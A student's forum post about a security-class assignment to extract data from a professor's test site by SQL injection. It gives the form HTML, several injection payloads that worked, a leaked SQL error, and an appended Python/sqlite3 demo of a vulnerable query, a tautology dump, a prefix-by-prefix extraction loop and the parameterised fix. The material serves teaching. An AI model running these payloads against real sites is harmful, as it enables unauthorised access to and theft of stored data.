I'm taking a computer security class and an assignment is to break into a website the professor set up to get a value assigned to a particular name via SQL injection.
The website has a form with four fields and a submit button: ID, password, number, and code.
The submit button does a post to a .pl script.
Hints the teacher provided:
- The ID field always consists of 16 random capital letters and digits.
- The HTML source code is your friend (I looked through it, nothing seemed terribly helpful.)
- Try to force the application to produce an error message (remember: you are testing for SQL Injection vulnerability) and then use the information in this message to iteratively extract the information you are looking for from the database.
No matter what I enter in the fields, it always gives me things like "invalid number" or "invalid code" or "ID and password don't match a valid user."
I've tried inserting things like -- in every field, I've inserted things like " ' OR TRUE" in all the fields... nothing I can think of produces an actual error from a SQL database or gives me insight into what the fields of the database are.
Here's the HTML source:
Code:
<html>
<head>
<title>Online Access</title>
</head>
<body>
<form action="loginece.pl" method="post">
<br>
<b> Access ID: </b>
<input type="text" name="access" size="16">
<br>
<b> Password: </b>
<input type="password" name="password" size="10">
<br>
<b> Your Husce number: </b>
<input type="text" name="ece5968" size="3" maxlength="10">
<br>
<b> Your registration code: </b>
<input type="text" name="matnr" size="7" maxlength="7">
<br>
<br>
<input type="submit" name="login" value="Login">
</form>
</body>
</html>
We were also provided with a set of valid credentials.
Using those takes you to a second page which prints out your access ID... and has a "Show Information" button. I didn't use the web inspector on this page before, but just now I realized it uses a client-side script and hidden fields... maybe if I play around with those they aren't validated like the front page fields are?
Edit: Submitting odd values here doesn't cause it to dump an error message, but it causes the page to not be populated...
2X Edit: Okay, finished my assignment. Inserting "' OR 'A'='A" in one of the hidden fields caused it to hand over a few values from the SQL database that my credentials shouldn't have been capable of obtaining.
3X Edit: Further experimentation (there's a bonus credit section) has yielded an actual SQL error message... inserting "'OR user LIKE '%egg'" in a hidden field produced this:
There is a problem in the statement: select * from credit where token='eyhd782327uhhdsjke982379093723' and access_id='' OR user LIKE '%egg'
4X Edit: Finished my assignment by inserting the following into a hidden field:
' OR access_id='A%' -- (there was a space at the end)
This caused it to list everything in the database with an access_id starting with A. I proceeded with B%, C%, D%, E%, and F% to get every piece of data needed for my assignment.
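As an added example (not part of the post above, and not the class's loginece.pl script), here is a Python/sqlite3 reconstruction of what the leaked statement tells you: the "Show Information" query splices the hidden-field values straight into SQL text, so a quote in access_id ends the string literal and anything after it is interpreted as SQL. The table layout (token, access_id, user, plus an assumed credit column), the row contents and the token strings are all constructed for this demo. It shows the error-probe step from the teacher's hint, the `' OR 'A'='A` tautology, the prefix walk from the last edit, and the same query written with bound parameters, which is what the script should have done. The prefix walk uses LIKE rather than `=`, because in SQLite (and in standard SQL) `=` compares the `%` literally.

```python
import sqlite3

# Constructed sample rows shaped like the table named in the leaked statement.
# Tokens, access IDs, user names and credit values are made up for this demo.
SAMPLE_ROWS = [
    ("tok-alice-0001",  "A7Q2M9X4K1L8P3R6", "alice",  120),
    ("tok-bob-0002",    "B3N8V1C5Z9W2Y4T7", "bob",     45),
    ("tok-carol-0003",  "A1S2D3F4G5H6J7K8", "carol",  300),
    ("tok-eggman-0004", "F9E8D7C6B5A4Z3Y2", "eggman",   5),
]


def make_db():
    """In-memory database with a 'credit' table matching the leaked query."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "create table credit (token text, access_id text, user text, credit integer)"
    )
    conn.executemany("insert into credit values (?, ?, ?, ?)", SAMPLE_ROWS)
    return conn


def show_information_vulnerable(conn, token, access_id):
    """Mirrors the statement shape in the error message: values are pasted into
    the SQL text, so a single quote inside access_id closes the literal."""
    sql = (
        "select * from credit where token='" + token
        + "' and access_id='" + access_id + "'"
    )
    return conn.execute(sql).fetchall()


def show_information_safe(conn, token, access_id):
    """Same query with bound parameters: the driver sends the values separately
    from the SQL text, so quotes and OR/LIKE in them are never parsed as SQL."""
    sql = "select * from credit where token=? and access_id=?"
    return conn.execute(sql, (token, access_id)).fetchall()


def probe_for_error(conn, token, access_id):
    """The teacher's hint: an unbalanced quote makes the database complain.
    An application that echoes the exception text leaks the statement shape."""
    try:
        show_information_vulnerable(conn, token, access_id)
        return None
    except sqlite3.OperationalError as exc:
        return str(exc)


def dump_by_prefix(conn, token, prefixes):
    """Walk the access_id space one leading character at a time, the way the
    post walks A%, B%, ... F%. The '--' comments out the trailing quote the
    script appends; the space after it is required by some servers."""
    found = {}
    for p in prefixes:
        payload = "' OR access_id LIKE '" + p + "%' -- "
        found[p] = show_information_vulnerable(conn, token, payload)
    return found


if __name__ == "__main__":
    db = make_db()
    print("error probe:", probe_for_error(db, "bogus", "'"))
    print("tautology:", show_information_vulnerable(db, "bogus", "' OR 'A'='A"))
    print("safe query:", show_information_safe(db, "bogus", "' OR 'A'='A"))
    for prefix, rows in dump_by_prefix(db, "bogus", "ABF").items():
        print(prefix + "%:", [r[2] for r in rows])
```

Run it as a script to see the four behaviours side by side. Note that the token value never needs to be valid for the injected queries: because AND binds tighter than OR, `token='bogus' and access_id=''` evaluates to false for every row and the injected OR clause alone decides what comes back, which is why the post's credentials "shouldn't have been capable" of reaching those rows yet did.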